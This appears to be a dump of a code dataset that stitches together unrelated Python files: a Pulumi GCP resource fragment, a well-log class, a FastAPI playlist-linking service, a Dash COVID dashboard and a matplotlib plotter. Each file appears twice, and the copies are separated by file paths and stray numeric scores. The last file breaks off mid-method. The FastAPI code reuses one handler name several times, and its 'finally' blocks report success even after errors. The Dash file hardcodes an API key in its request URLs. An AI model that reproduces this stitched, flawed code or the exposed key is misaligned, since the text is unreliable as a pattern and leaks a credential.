__props__ = _GlobalNetworkEndpointState.__new__(_GlobalNetworkEndpointState)
__props__.__dict__["fqdn"] = fqdn
__props__.__dict__["global_network_endpoint_group"] = global_network_endpoint_group
__props__.__dict__["ip_address"] = ip_address
__props__.__dict__["port"] = port
__props__.__dict__["project"] = project
return GlobalNetworkEndpoint(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def fqdn(self) -> pulumi.Output[Optional[str]]:
"""
Fully qualified domain name of network endpoint.
This can only be specified when network_endpoint_type of the NEG is INTERNET_FQDN_PORT.
"""
return pulumi.get(self, "fqdn")
@property
@pulumi.getter(name="globalNetworkEndpointGroup")
def global_network_endpoint_group(self) -> pulumi.Output[str]:
"""
The global network endpoint group this endpoint is part of.
"""
return pulumi.get(self, "global_network_endpoint_group")
@property
@pulumi.getter(name="ipAddress")
def ip_address(self) -> pulumi.Output[Optional[str]]:
"""
IPv4 address external endpoint.
"""
return pulumi.get(self, "ip_address")
@property
@pulumi.getter
def port(self) -> pulumi.Output[int]:
"""
Port number of the external endpoint.
"""
return pulumi.get(self, "port")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The ID of the project in which the resource belongs.
If it is not provided, the provider project is used.
"""
return pulumi.get(self, "project") | 0.859678 | 0.055183 |
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from builtins import zip, open
__author__ = "yuhao"
import numpy as np
import matplotlib.pyplot as plt
class Log(object):
"""
class for well log data
"""
def __init__(self, file_name=None, log_name="unk"):
"""
Parameters
----------
file_name : str
pseudo las file path
log_name : str
log name to create
"""
self.name = log_name
self.units = ""
self.descr = ""
self.prop_type = None
self.__data = []
self.__depth = []
self.log_start = None
self.log_stop = None
self.depth_start = None
self.depth_stop = None
self.log_start_idx = None
self.log_stop_idx = None
if file_name is not None:
self.__init_from_file(file_name)
@classmethod
def from_scratch(cls, depth, data, name=None, units=None, descr=None,
prop_type=None):
log = cls()
log.depth = np.array(depth)
log.data = np.array(data)
log.name = name
log.units = units
log.descr = descr
log.prop_type = prop_type
return log
def __init_from_file(self, file_name):
self._read_od(file_name)
try:
shorthand = self.descr[:3].lower()
self.name = shorthand + "_unk"
prop_dict = {
'vel': 'VEL',
'den': 'DEN',
'sha': 'VSH',
'ove': 'PRE',
'pre': 'PRE'
}
try:
self.prop_type = prop_dict[shorthand]
except KeyError:
pass
except IndexError:
self.name = "unk_unk"
def __len__(self):
return len(self.__data)
def __str__(self):
return "Well_Log:{}({}[{}])".format(self.name, self.descr, self.units)
def __bool__(self):
return bool(bool(self.__depth) and bool(self.__data))
def __eq__(self, other):
return self.depth == other.depth and self.data == other.data
@property
def depth(self):
"depth data of the log"
return list(self.__depth)
@depth.setter
def depth(self, values):
self.__depth = list(values)
@property
def data(self):
"property data of the log"
return list(self.__data)
@data.setter
def data(self, values):
self.__data = list(values)
@property
def start(self):
"start depth of available property data"
if self.log_start is None:
for dep, dat in zip(self.__depth, self.__data):
if np.isfinite(dat):
self.log_start = dep
break
return self.log_start
@property
def start_idx(self):
"start index of available property data"
if self.log_start_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_start_idx = index[0][0]
return self.log_start_idx
@property
def stop(self):
"end depth of available property data"
if self.log_stop is None:
for dep, dat in zip(reversed(self.__depth), reversed(self.__data)):
if np.isfinite(dat):
self.log_stop = dep
break
return self.log_stop
@property
def stop_idx(self):
"end index of available property data"
if self.log_stop_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_stop_idx = index[0][-1] + 1
# so when used in slice, +1 will not needed.
return self.log_stop_idx
@property
def top(self):
"top depth of this log"
return self.__depth[0]
@property
def bottom(self):
"bottom depth of this log"
return self.__depth[-1]
def _read_od(self, file_name):
try:
with open(file_name, "r") as fin:
info_list = fin.readline().split('\t')
temp_list = info_list[-1].split('(')
self.descr = temp_list[0]
self.units = temp_list[1][:-2]
for line in fin:
tempList = line.split()
self.__depth.append(round(float(tempList[0]), 1))
if tempList[1] == "1e30":
self.__data.append(np.nan)
else:
self.__data.append(float(tempList[1]))
except Exception as inst:
print('{}: '.format(self.name))
print(inst.args)
def to_las(self, file_name):
"""
Save as pseudo-las file
"""
try:
with open(file_name, 'w') as fout:
split_list = self.descr.split(' ')
description = '_'.join(split_list)
fout.write("Depth(m)\t" + description + "(" + self.units + ")\n")
for d, v in zip(self.__depth, self.__data):
d = str(d)
v = str(v) if np.isfinite(v) else "1e30"
fout.write("\t".join([d, v]) + "\n")
except Exception as inst:
print(inst.args)
def get_depth_idx(self, d):
"return index of depth"
if d > self.bottom or d < self.top:
return None
else:
return int((d - self.top) // 0.1)
def get_data(self, depth):
"get data at certain depth"
depth_idx = list()
for de in depth:
depth_idx.append(self.get_depth_idx(de))
log_depth = np.array(self.__depth)
log_data = np.array(self.__data)
mask = log_depth < 0
for idx in depth_idx:
if idx is not None:
mask[idx] = True
return log_data[mask]
def get_resampled(self, rate):
"return resampled log"
standard_log_step = 0.1
step = int(rate // standard_log_step) + 1
log = Log()
log.depth = self.depth[::step]
log.data = self.data[::step]
return log
def plot(self, ax=None, color='gray', linewidth=0.5, linestyle='-',
label=None, zorder=1):
"""
Plot log curve
Parameters
----------
ax : matplotlib.axes._subplots.AxesSubplot
axis object to plot on, a new axis will be created if not provided
Returns
-------
matplotlib.axes._subplots.AxesSubplot
"""
if ax is None:
_, ax = plt.subplots()
ax.invert_yaxis()
if label is None:
label = self.descr
ax.plot(self.data, self.depth, linewidth=linewidth, color=color,
linestyle=linestyle, label=label, zorder=zorder)
ax.set(xlabel="{}({})".format(self.descr, self.units),
ylabel="Depth(m)",
title=self.name)
return ax | pygeopressure/basic/well_log.py | from __future__ import (absolute_import, division, print_function,
unicode_literals)
from builtins import zip, open
__author__ = "yuhao"
import numpy as np
import matplotlib.pyplot as plt
class Log(object):
"""
class for well log data
"""
def __init__(self, file_name=None, log_name="unk"):
"""
Parameters
----------
file_name : str
pseudo las file path
log_name : str
log name to create
"""
self.name = log_name
self.units = ""
self.descr = ""
self.prop_type = None
self.__data = []
self.__depth = []
self.log_start = None
self.log_stop = None
self.depth_start = None
self.depth_stop = None
self.log_start_idx = None
self.log_stop_idx = None
if file_name is not None:
self.__init_from_file(file_name)
@classmethod
def from_scratch(cls, depth, data, name=None, units=None, descr=None,
prop_type=None):
log = cls()
log.depth = np.array(depth)
log.data = np.array(data)
log.name = name
log.units = units
log.descr = descr
log.prop_type = prop_type
return log
def __init_from_file(self, file_name):
self._read_od(file_name)
try:
shorthand = self.descr[:3].lower()
self.name = shorthand + "_unk"
prop_dict = {
'vel': 'VEL',
'den': 'DEN',
'sha': 'VSH',
'ove': 'PRE',
'pre': 'PRE'
}
try:
self.prop_type = prop_dict[shorthand]
except KeyError:
pass
except IndexError:
self.name = "unk_unk"
def __len__(self):
return len(self.__data)
def __str__(self):
return "Well_Log:{}({}[{}])".format(self.name, self.descr, self.units)
def __bool__(self):
return bool(bool(self.__depth) and bool(self.__data))
def __eq__(self, other):
return self.depth == other.depth and self.data == other.data
@property
def depth(self):
"depth data of the log"
return list(self.__depth)
@depth.setter
def depth(self, values):
self.__depth = list(values)
@property
def data(self):
"property data of the log"
return list(self.__data)
@data.setter
def data(self, values):
self.__data = list(values)
@property
def start(self):
"start depth of available property data"
if self.log_start is None:
for dep, dat in zip(self.__depth, self.__data):
if np.isfinite(dat):
self.log_start = dep
break
return self.log_start
@property
def start_idx(self):
"start index of available property data"
if self.log_start_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_start_idx = index[0][0]
return self.log_start_idx
@property
def stop(self):
"end depth of available property data"
if self.log_stop is None:
for dep, dat in zip(reversed(self.__depth), reversed(self.__data)):
if np.isfinite(dat):
self.log_stop = dep
break
return self.log_stop
@property
def stop_idx(self):
"end index of available property data"
if self.log_stop_idx is None:
self.__data = np.array(self.__data)
mask = np.isfinite(self.__data)
index = np.where(mask == True)
self.log_stop_idx = index[0][-1] + 1
# so when used in slice, +1 will not needed.
return self.log_stop_idx
@property
def top(self):
"top depth of this log"
return self.__depth[0]
@property
def bottom(self):
"bottom depth of this log"
return self.__depth[-1]
def _read_od(self, file_name):
try:
with open(file_name, "r") as fin:
info_list = fin.readline().split('\t')
temp_list = info_list[-1].split('(')
self.descr = temp_list[0]
self.units = temp_list[1][:-2]
for line in fin:
tempList = line.split()
self.__depth.append(round(float(tempList[0]), 1))
if tempList[1] == "1e30":
self.__data.append(np.nan)
else:
self.__data.append(float(tempList[1]))
except Exception as inst:
print('{}: '.format(self.name))
print(inst.args)
def to_las(self, file_name):
"""
Save as pseudo-las file
"""
try:
with open(file_name, 'w') as fout:
split_list = self.descr.split(' ')
description = '_'.join(split_list)
fout.write("Depth(m)\t" + description + "(" + self.units + ")\n")
for d, v in zip(self.__depth, self.__data):
d = str(d)
v = str(v) if np.isfinite(v) else "1e30"
fout.write("\t".join([d, v]) + "\n")
except Exception as inst:
print(inst.args)
def get_depth_idx(self, d):
"return index of depth"
if d > self.bottom or d < self.top:
return None
else:
return int((d - self.top) // 0.1)
def get_data(self, depth):
"get data at certain depth"
depth_idx = list()
for de in depth:
depth_idx.append(self.get_depth_idx(de))
log_depth = np.array(self.__depth)
log_data = np.array(self.__data)
mask = log_depth < 0
for idx in depth_idx:
if idx is not None:
mask[idx] = True
return log_data[mask]
def get_resampled(self, rate):
"return resampled log"
standard_log_step = 0.1
step = int(rate // standard_log_step) + 1
log = Log()
log.depth = self.depth[::step]
log.data = self.data[::step]
return log
def plot(self, ax=None, color='gray', linewidth=0.5, linestyle='-',
label=None, zorder=1):
"""
Plot log curve
Parameters
----------
ax : matplotlib.axes._subplots.AxesSubplot
axis object to plot on, a new axis will be created if not provided
Returns
-------
matplotlib.axes._subplots.AxesSubplot
"""
if ax is None:
_, ax = plt.subplots()
ax.invert_yaxis()
if label is None:
label = self.descr
ax.plot(self.data, self.depth, linewidth=linewidth, color=color,
linestyle=linestyle, label=label, zorder=zorder)
ax.set(xlabel="{}({})".format(self.descr, self.units),
ylabel="Depth(m)",
title=self.name)
return ax | 0.750553 | 0.192312 |
from fastapi import FastAPI, HTTPException, Depends, Security
from models.api_permission import APIPermission
from fastapi.security.api_key import APIKeyHeader
from fastapi import FastAPI
from fastapi.security.api_key import APIKeyHeader
import uvicorn
from core.auth_repository import AuthRepository
from api.spoti import get_user_playlists, get_linked_playlists
from db.base_repository import init, link_lists,unlink_list,get_linked_lists
app = FastAPI()
client_key = APIKeyHeader(name='client_key')
@app.on_event("startup")
async def startup_event():
init(app)
global scope
async def authenticate(
client_key: str = Security(client_key)
):
permission = await AuthRepository().authenticate(client_key)
if permission is None:
raise HTTPException(status_code=401, detail='unathenticated: missing client_key')
return permission
@app.get("/playlists")
async def my_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_user_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.get("/linked-playlists")
async def linked_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_linked_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.post("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def link_playlists(sync_from_id, sync_to_id):
try:
await link_lists(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally: return 'Success!'
@app.delete("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def unlink_playlists(sync_from_id, sync_to_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_from_id}")
async def unlink_playlists(sync_from_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_to_id}")
async def unlink_playlists(sync_to_id):
try:
delete_count = await unlink_list(sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_to_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlists")
async def unlink_playlists():
try:
delete_count = await unlink_list()
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"no playlists found for deletion"
)
return f'deleted {delete_count} items'
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000) | main.py | from fastapi import FastAPI, HTTPException, Depends, Security
from models.api_permission import APIPermission
from fastapi.security.api_key import APIKeyHeader
from fastapi import FastAPI
from fastapi.security.api_key import APIKeyHeader
import uvicorn
from core.auth_repository import AuthRepository
from api.spoti import get_user_playlists, get_linked_playlists
from db.base_repository import init, link_lists,unlink_list,get_linked_lists
app = FastAPI()
client_key = APIKeyHeader(name='client_key')
@app.on_event("startup")
async def startup_event():
init(app)
global scope
async def authenticate(
client_key: str = Security(client_key)
):
permission = await AuthRepository().authenticate(client_key)
if permission is None:
raise HTTPException(status_code=401, detail='unathenticated: missing client_key')
return permission
@app.get("/playlists")
async def my_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_user_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.get("/linked-playlists")
async def linked_playlists(permission: APIPermission = Depends(authenticate)):
try:
pl = None
pl = await get_linked_playlists(permission)
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if pl is None:
raise HTTPException(status_code=404, detail="no playlists found")
return pl
@app.post("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def link_playlists(sync_from_id, sync_to_id):
try:
await link_lists(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally: return 'Success!'
@app.delete("/linked_playlists/{sync_from_id}/{sync_to_id}")
async def unlink_playlists(sync_from_id, sync_to_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip(), sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_from_id}")
async def unlink_playlists(sync_from_id):
try:
delete_count = await unlink_list(sync_from=sync_from_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_from_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlist/{sync_to_id}")
async def unlink_playlists(sync_to_id):
try:
delete_count = await unlink_list(sync_to=sync_to_id.strip())
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"playlists with id: {sync_to_id} not found for deletion"
)
return f'deleted {delete_count} items'
@app.delete("/linked_playlists")
async def unlink_playlists():
try:
delete_count = await unlink_list()
except Exception as e:
raise HTTPException(status_code=500, detail= e)
finally:
if delete_count == 0:
raise HTTPException(
status_code=404,
detail=f"no playlists found for deletion"
)
return f'deleted {delete_count} items'
if __name__ == "__main__":
uvicorn.run(app, host="0.0.0.0", port=8000) | 0.383988 | 0.053626 |
import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import requests
import csv
import dash
from dash import dcc
from dash import html
"""functions for state data"""
def hist_covid_state_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/states.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_state.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_state.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_state.csv") # saving the new df to a csv
def current_covid_state_data():
'''function to get just current covid data by state 14 days ago'''
state_df = pd.read_csv("hist_state.csv") #reading the csv
last_item = state_df['date'].iloc[-14] # getting the last item in the date col
filter_df = state_df['date'] == last_item
final_state_df = state_df[filter_df]
final_state_df.to_csv("current_state.csv") # saving updated csv to file
return final_state_df
hist_covid_state_data() # getting the state data
state_data_df = current_covid_state_data() # transforming the state data to be usable and storing a df
# converting the total cases and total deaths to ints first to remove the .0 at the end when converting to string later
state_data_df['actuals.cases'] = state_data_df['actuals.cases'].apply(int)
state_data_df['actuals.deaths'] = state_data_df['actuals.deaths'].apply(int)
# here im adding another col to the df, which is a string with extra infomation by state
state_data_df['text'] = state_data_df['state']+'<br>'+\
'Total Cases ' + state_data_df['actuals.cases'].astype(str)+ '<br>' + \
'Total Deaths ' + state_data_df['actuals.deaths'].astype(str)
# building state map graph
fig_state = go.Figure(data=go.Choropleth(
locations=state_data_df['state'], # Spatial coordinates
z = state_data_df['metrics.testPositivityRatio'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Ratio",
text=state_data_df['text']
))
fig_state.update_layout(
title_text = 'Ratio of Positive Tests in the Past 7 Days',
geo_scope='usa', # limite map scope to USA
)
"""functions for US data"""
def hist_covid_us_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/country/US.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_us.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_us.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_us.csv") # saving the new df to a csv
def current_covid_us_data():
'''function to get just current covid data by state 14 days ago'''
us_df = pd.read_csv("hist_us.csv") #reading the csv
last_item = us_df['date'].iloc[-14] # getting the last item in the date col
filter_df = us_df['date'] == last_item
final_us_df = us_df[filter_df]
final_us_df.to_csv("current_us.csv") # saving updated csv to file
return final_us_df
hist_covid_us_data() # running func to get US historal data
us_df = pd.read_csv('hist_us.csv') # building df for us hist data
# building line chart for US cases
figure_us_hist = go.Figure()
figure_us_hist.add_trace(go.Scatter(x=us_df['date'],
y=us_df['metrics.caseDensity']))
figure_us_hist.update_layout(title='Number of cases per 100k population using a 7-day rolling average',
xaxis_title = 'Date',
yaxis_title='Cases',
plot_bgcolor='white')
# building a table graph for vaccines and other info
figure_vaccine = go.Figure(data=[go.Table(
header=dict(values=['State',
'Complete Vaccination Ratio',
'ICU Bed Ratio',
'Case Density per 100K'],
fill_color='lightsteelblue',
line_color='black',
align='left'),
cells=dict(values=[state_data_df['state'],
state_data_df['metrics.vaccinationsCompletedRatio'],
state_data_df['metrics.icuCapacityRatio'],
state_data_df['metrics.caseDensity']],
fill_color='white',
line_color='black',
align='left'))
])
figure_vaccine.update_layout(title='Vaccine Completion, ICU Capacity, and Case Density Rates')
# building the dash app
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__,external_stylesheets=external_stylesheets)
app.title = 'Covid Tracking WIP'
app.layout = html.Div(children=[
# All elements from the top of the page
html.Div([
html.Div([
html.H1(children='Covid Tracking'),
html.Div(children=''),
dcc.Graph(
id='graph1',
figure=fig_state
),
], className='six columns'),
html.Div([
html.H1(children='WIP'),
html.Div(children=''),
dcc.Graph(
id='graph2',
figure=figure_vaccine
),
], className='six columns'),
], className='row'),
# New Div for all elements in the new 'row' of the page
html.Div([
html.H1(children=''),
html.Div(children='''
'''),
dcc.Graph(
id='graph3',
figure=figure_us_hist
),
], className='row'),
])
if __name__ == '__main__':
app.run_server(debug=False) # this needs to be false for some reason | dash app wip.py | import numpy as np
import pandas as pd
import plotly.express as px
import plotly.graph_objects as go
import requests
import csv
import dash
from dash import dcc
from dash import html
"""functions for state data"""
def hist_covid_state_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/states.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_state.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_state.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_state.csv") # saving the new df to a csv
def current_covid_state_data():
'''function to get just current covid data by state 14 days ago'''
state_df = pd.read_csv("hist_state.csv") #reading the csv
last_item = state_df['date'].iloc[-14] # getting the last item in the date col
filter_df = state_df['date'] == last_item
final_state_df = state_df[filter_df]
final_state_df.to_csv("current_state.csv") # saving updated csv to file
return final_state_df
hist_covid_state_data() # getting the state data
state_data_df = current_covid_state_data() # transforming the state data to be usable and storing a df
# converting the total cases and total deaths to ints first to remove the .0 at the end when converting to string later
state_data_df['actuals.cases'] = state_data_df['actuals.cases'].apply(int)
state_data_df['actuals.deaths'] = state_data_df['actuals.deaths'].apply(int)
# here im adding another col to the df, which is a string with extra infomation by state
state_data_df['text'] = state_data_df['state']+'<br>'+\
'Total Cases ' + state_data_df['actuals.cases'].astype(str)+ '<br>' + \
'Total Deaths ' + state_data_df['actuals.deaths'].astype(str)
# building state map graph
fig_state = go.Figure(data=go.Choropleth(
locations=state_data_df['state'], # Spatial coordinates
z = state_data_df['metrics.testPositivityRatio'].astype(float), # Data to be color-coded
locationmode = 'USA-states', # set of locations match entries in `locations`
colorscale = 'Reds',
colorbar_title = "Ratio",
text=state_data_df['text']
))
fig_state.update_layout(
title_text = 'Ratio of Positive Tests in the Past 7 Days',
geo_scope='usa', # limite map scope to USA
)
"""functions for US data"""
def hist_covid_us_data():
'''func to get historic covid data by state'''
url_hist = r"https://api.covidactnow.org/v2/country/US.timeseries.csv?apiKey=e00f7fdd626a4ac3a6531d10385bf552"
response = requests.get(url_hist)
# code to take the response and write it to a csv line by line
with open('hist_us.csv', 'w') as f:
writer = csv.writer(f)
for line in response.iter_lines():
writer.writerow(line.decode('utf-8').split(','))
hist_data = pd.read_csv("hist_us.csv",index_col=[0]) # taking the csv into a df
hist_data.dropna(how='all',inplace=True) # removing completely empty rows
hist_data.to_csv("hist_us.csv") # saving the new df to a csv
def current_covid_us_data():
'''function to get just current covid data by state 14 days ago'''
us_df = pd.read_csv("hist_us.csv") #reading the csv
last_item = us_df['date'].iloc[-14] # getting the last item in the date col
filter_df = us_df['date'] == last_item
final_us_df = us_df[filter_df]
final_us_df.to_csv("current_us.csv") # saving updated csv to file
return final_us_df
hist_covid_us_data() # running func to get US historal data
us_df = pd.read_csv('hist_us.csv') # building df for us hist data
# building line chart for US cases
figure_us_hist = go.Figure()
figure_us_hist.add_trace(go.Scatter(x=us_df['date'],
y=us_df['metrics.caseDensity']))
figure_us_hist.update_layout(title='Number of cases per 100k population using a 7-day rolling average',
xaxis_title = 'Date',
yaxis_title='Cases',
plot_bgcolor='white')
# building a table graph for vaccines and other info
figure_vaccine = go.Figure(data=[go.Table(
header=dict(values=['State',
'Complete Vaccination Ratio',
'ICU Bed Ratio',
'Case Density per 100K'],
fill_color='lightsteelblue',
line_color='black',
align='left'),
cells=dict(values=[state_data_df['state'],
state_data_df['metrics.vaccinationsCompletedRatio'],
state_data_df['metrics.icuCapacityRatio'],
state_data_df['metrics.caseDensity']],
fill_color='white',
line_color='black',
align='left'))
])
figure_vaccine.update_layout(title='Vaccine Completion, ICU Capacity, and Case Density Rates')
# building the dash app
external_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']
app = dash.Dash(__name__,external_stylesheets=external_stylesheets)
app.title = 'Covid Tracking WIP'
app.layout = html.Div(children=[
# All elements from the top of the page
html.Div([
html.Div([
html.H1(children='Covid Tracking'),
html.Div(children=''),
dcc.Graph(
id='graph1',
figure=fig_state
),
], className='six columns'),
html.Div([
html.H1(children='WIP'),
html.Div(children=''),
dcc.Graph(
id='graph2',
figure=figure_vaccine
),
], className='six columns'),
], className='row'),
# New Div for all elements in the new 'row' of the page
html.Div([
html.H1(children=''),
html.Div(children='''
'''),
dcc.Graph(
id='graph3',
figure=figure_us_hist
),
], className='row'),
])
if __name__ == '__main__':
app.run_server(debug=False) # this needs to be false for some reason | 0.445409 | 0.314682 |
import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib.ticker import ScalarFormatter
from mpl_toolkits.mplot3d import Axes3D
class Plot2d(object):
def __init__(self, workdir, filepath, ndesign, nobject, name):
self.workdir = workdir
self.filepath = filepath
self.ndesign = ndesign
self.nobject = nobject
self.name = name
# フォントの設定
plt.rcParams['font.family'] = 'serif' # 使用するフォント
plt.rcParams['font.size'] = 8 # フォントの大きさ
# 軸の設定
plt.rcParams['xtick.direction'] = 'in' # x軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['ytick.direction'] = 'in' # y軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['xtick.major.width'] = 1.0 # x軸主目盛り線の幅
plt.rcParams['ytick.major.width'] = 1.0 # y軸主目盛り線の幅
plt.rcParams['axes.linewidth'] = 1.0 # 軸の線幅edge linewidth。囲みの太さ
plt.rcParams['grid.linestyle']='--' # グリッド線を破線に
# 凡例の設定
plt.rcParams["legend.markerscale"] = 1
plt.rcParams["legend.fancybox"] = False
plt.rcParams["legend.framealpha"] = 1
plt.rcParams["legend.edgecolor"] = 'black'
def plot(self, header):
self.header = header
# CSVからデータ読み込み.1行目は列名として指定
data = pd.read_csv(self.filepath, header = self.header) # index(=行名)はheader行の次の行を0として付与してくれる
obj_data = data.iloc[:, self.ndesign:self.ndesign + self.nobject]
# 2Dグラフの作成
fig = plt.figure(figsize=(3.4, 3.4)) # プロットエリアが正方形になるように
ax = fig.add_subplot(1, 1, 1)
# 2D散布図の作成
ax.scatter(obj_data.iloc[:, 0], obj_data.iloc[:, 1], s=10, c='blue', edgecolors='black', linewidths='1', marker='o', alpha = '0.5')
# ラベルの指定
ax.set_xlabel(r'Object Function 1')
ax.set_ylabel(r'Object Function 2')
# グラフタイトルの設定
ax.set_title(self.name)
# 軸目盛りの指数表示指定
ax.xaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.yaxis.set_major_formatter(FixedOrderFormatter(useMathText=True))
ax.ticklabel_format(style="sci", scilimits=(0,0), axis="both")
#ax.set_xlim(self.xmin, self.xmax)
#ax.set_ylim(self.ymin, self.ymax)
# グリッド
ax.grid(zorder=0)
# 凡例の表示
#ax.legend(loc='upper right') # locで場所の固定
# グラフの保存
plt.savefig(self.workdir + '/' + self.name + '.png', format='png', dpi=600, bbox_inches="tight", pad_inches=0.05)
# グラフの表示
plt.show()
#クラス設定 ※ScalarFormatterを継承
class FixedOrderFormatter(ScalarFormatter):
def __init__(self, order_of_mag=0, useOffset=True, useMathText=True):
self._order_of_mag = order_of_mag
ScalarFormatter.__init__(self, useOffset=useOffset,
useMathText=useMathText)
def _set_orderOfMagnitude(self, range):
self.orderOfMagnitude = self._order_of_mag | plot2d.py | import numpy as np
import pandas as pd
from matplotlib import pyplot as plt
from matplotlib.ticker import ScalarFormatter
from mpl_toolkits.mplot3d import Axes3D
class Plot2d(object):
def __init__(self, workdir, filepath, ndesign, nobject, name):
self.workdir = workdir
self.filepath = filepath
self.ndesign = ndesign
self.nobject = nobject
self.name = name
# フォントの設定
plt.rcParams['font.family'] = 'serif' # 使用するフォント
plt.rcParams['font.size'] = 8 # フォントの大きさ
# 軸の設定
plt.rcParams['xtick.direction'] = 'in' # x軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['ytick.direction'] = 'in' # y軸の目盛線が内向き('in')か外向き('out')か双方向か('inout')
plt.rcParams['xtick.major.width'] = 1.0 # x軸主目盛り線の幅
plt.rcParams['ytick.major.width'] = 1.0 # y軸主目盛り線の幅
plt.rcParams['axes.linewidth'] = 1.0 # 軸の線幅edge linewidth。囲みの太さ
plt.rcParams['grid.linestyle']='--' # グリッド線を破線に
# 凡例の設定
plt.rcParams["legend.markerscale"] = 1
plt.rcParams["legend.fancybox"] = False
plt.rcParams["legend.framealpha"] = 1
plt.rcParams["legend.edgecolor"] = 'black'
def plot(self, header):
self.header = header
# CSVからデータ読み込み.1行目は列名として指定
data = pd.read_csv(self.filepath, header = self.header) # index(=行名)はheader行の次の行を0として付与してくれる
obj_data = data.iloc[:, self.ndesign:self.ndesign + self.nobject]
# 2Dグラフの作成
fig = plt.figure(figsize=(3.4, 3.4)) # プロットエリアが正方形になるように
ax = fig.add_subplot(1, 1, 1)
# 2D散布図の作成
ax.scatter(obj_data.iloc[:, 0], obj_data.iloc[:, 1], s=10, c='blue', edgecolors='black', linewidths='1', marker='o', alpha = '0.5')
# ラベルの指定
ax.set_xlabel(r'Object Function 1')
ax.set_ylabel(r'Object Function 2')
# グラフタイトルの設定
ax.set_title(self.name)
# 軸目盛りの指数表示指定
